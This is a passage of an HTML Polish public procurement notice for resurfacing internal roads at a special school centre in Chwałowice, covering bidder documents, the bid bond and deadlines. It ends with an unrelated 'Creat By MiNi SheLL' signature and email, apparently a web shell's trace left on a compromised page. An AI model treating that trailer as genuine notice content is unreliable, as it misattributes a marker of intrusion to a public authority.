Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;(jeżeli wykonawca<br/>wskaże w formularzu ofertowym zamawiający samodzielnie pobierze z ogólnodostępnych rejestrów<br/>)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast informacji zKrajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej–składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywaminie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty<br/>potwierdzające w/wokoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ichmowa<br/>w art.125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w:a) art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania<br/>prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu podatków, opłat<br/>lubskładek na ubezpieczenie społeczne i zdrowotne.b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,c) art. 108<br/>ust. 1 pkt 6 ustawy Pzp,d) art. 109 ust. 1 pkt 1, 4 i pkt 5 - 10 ustawy Pzp - wg załącznika 12 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania<br/>warunków<br/>udziału w postępowaniu: potwierdzających spełnianie warunków udziału w<br/>postępowaniudotyczących zdolności technicznej lub zawodowej (doświadczenie, kwalifikacje<br/>zawodowe kadry technicznej):a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju,wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, orazzałączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty; załącznik nr 3 wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>załącznik nr 4Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o<br/>udzielenie zamówienia,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości: (do 1,5%) 4 000,00 PLN<br/>(słownie złotych: cztery tysiące złotych 00/100),<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy<br/>Zamawiającego:<br/>Bank BNP Paribas Bank Polska<br/>26 16001462 1855 7907 3000 0003<br/>z adnotacją „Wadium – „Remont nawierzchni dróg wewnętrznych na terenie Specjalnego<br/>Ośrodka Szkolno-Wychowawczego w Chwałowicach&#34;<br/>4. Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które<br/>zostaniezaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu<br/>składania ofert.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem<br/>terminu składania ofert.<br/>6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub<br/>poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i<br/>powinna zawierać następujące elementy:<br/>a) nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego),<br/>gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b) kwotę wadium, <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązania są do ustanowienia pełnomocnika. Dokument pełnomocnictwa z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia<br/>tychwykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i<br/>powinno zawierać w szczególności wskazanie:- postępowania o zamówienie publiczne, którego<br/>dotyczy,- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego pełnomocnika oraz<br/>zakresu jego umocowania. Wymagana forma:Pełnomocnictwo powinno zostać złożone w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym lub kwalifikowanym podpisem elektronicznym. Dopuszcza się również przedłożenie<br/>elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj.<br/>podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia<br/>notariusza.b) zobowiązanie podmiotu trzeciego do oddania Wykonawcy do<br/>dyspozycjiniezbędnych zasobów na potrzeby realizacji zamówienia w przypadku gdy<br/>Wykonawca, w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ,<br/>będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów.Zobowiązanie<br/>podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdza, że<br/>stosunekłączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:- zakres dostępnych wykonawcy<br/>zasobów podmiotuudostępniającego zasoby;- sposób i okres udostępnienia wykonawcy i<br/>wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu<br/>zamówienia;- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega wodniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub<br/>usługi, których wskazane zdolności dotyczą.Wymagana forma:Zobowiązanie musi być złożone<br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem<br/>osobistym lub kwalifikowany podpisem elektrycznym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym<br/>dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowanie postanowienia umowy stanowi załącznik nr 8 do SWZ. Złożenie oferty jest<br/>jednoznaczne z akceptacją przez Wykonawcę projektowanych postanowień umowy.<br/>Zmawiający przewiduje możliwość zmiany umowy na podstawie art, 455 Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 15:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sosw-chwalowice.ezamawiajacy.pl /servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 16:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> „Remont nawierzchni dróg wewnętrznych na terenie Specjalnego Ośrodka Szkolno-Wychowawczego w Chwałowicach&#34; realizowany w ramach zadania<br/>inwestycyjnego pn.: „Przebudowa i rozbudowa budynku Specjalnego Ośrodka Szkolno-Wychowawczego w Chwałowicach wraz z zakupem pierwszego wyposażenia ośrodka oraz<br/>budowa przy budynku ośrodka mini obserwatorium astronomicznego i amfiteatru”

Creat By MiNi SheLL
Email: jattceo@gmail.com